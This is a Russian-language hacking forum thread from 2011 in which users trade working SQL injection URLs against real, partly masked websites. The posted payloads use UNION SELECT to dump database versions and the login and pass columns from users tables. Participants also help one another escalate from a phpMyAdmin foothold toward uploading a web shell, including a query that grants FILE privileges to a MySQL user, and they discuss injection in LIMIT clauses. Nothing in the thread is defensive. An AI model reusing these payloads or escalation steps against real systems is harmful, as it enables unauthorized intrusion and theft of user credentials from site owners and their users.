Старый 04.09.2011, 01:24   #1271
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Уязвимость
http://www.***.us/gbook/index.php?id=60'+union+select+1,2,3--+&pg=1
версия пятая
http://www.***.us/gbook/index.php?id=60'+AND+SUBSTRING(version(),1,1)=5--+
не могу вывод найти. Попробуйте, может у вас получится.

Последний раз редактировалось Twost; 17.05.2013 в 12:19..
Consistent вне форума   Ответить с цитированием
Старый 04.09.2011, 06:04   #1272
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

если есть одна скуль, значит с большой вероятностью есть и вторая(их там дохрена кстати)
с выводом:
Код:
http://www.***.us/link/out.php?id=669'+and+1=2+union+select+1,version(),3,4,5,6+--+1
вывод в Location:

Последний раз редактировалось Twost; 17.05.2013 в 12:19..
Andrey1800 вне форума   Ответить с цитированием
Старый 04.09.2011, 12:51   #1273
bloodAngel
 
Регистрация: 23.12.2010
Сообщений: 36
Репутация: -1
По умолчанию

http://www.***.org/index.asp?pageid=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+from+users

чтото не могу ничего зделать с ней , и вторая скуля интересная

http://www.***.org/templates/home.asp?pageid=1

Последний раз редактировалось Twost; 17.05.2013 в 12:19..
bloodAngel вне форума   Ответить с цитированием
Старый 04.09.2011, 15:29   #1274
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

http://www.***.org/index.asp?pageid=49+union+select+0,1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,login+from+users
http://www.***.org/index.asp?pageid=49+union+select+0,1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,pass+from+users

Последний раз редактировалось Twost; 17.05.2013 в 12:19..
salut вне форума   Ответить с цитированием
Старый 09.09.2011, 14:15   #1275
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

есть в руке phpmyadmin, но не мог шелл залить..
Цитата:
#1045 - Access denied for user 'admin_'@'localhost' (using password: YES)
или
Цитата:
Базы данных

* Новая база данных: Документация
Нет привилегий
как изменить привилегии mysql user'a ?
salut вне форума   Ответить с цитированием
Старый 09.09.2011, 15:31   #1276
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

update mysql.user set FILE_PRIV='Y' where user= 'admin_'
vp$ вне форума   Ответить с цитированием
Старый 09.09.2011, 20:33   #1277
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

@vp$,

Цитата:
#1142 - UPDATE command denied to user 'admin_'@'localhost' for table 'user'
salut вне форума   Ответить с цитированием
Старый 09.09.2011, 21:34   #1278
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

Цитата:
Сообщение от salut Посмотреть сообщение
@vp$,
Недостаточно прав.
Tigger вне форума   Ответить с цитированием
Старый 11.09.2011, 22:49   #1279
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от Raz0r Посмотреть сообщение
PHP 5.2.17 - только нулл-байт, но mq=on
SQLi в LIMIT'е после ORDER BY - только бесполезный INTO OUTFILE
http://bugs.mysql.com/bug.php?id=11918
кстати корень этого зла %)

так бы limit (100-@v:=... и с песней
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 13.09.2011, 20:02   #1280
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

На этом сайте http://***.com/index.php?action=search , когда в форму для поиска вписываешь какое-то значение c одинарной кавычкой, например ololo’ выводится ошибка:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/bigdave/domains/***.com/public_html/templates/main.php on line 68
Это, скуля и если “да” то, как ее раскрутить?

Последний раз редактировалось Twost; 17.05.2013 в 12:20..
Flakt вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot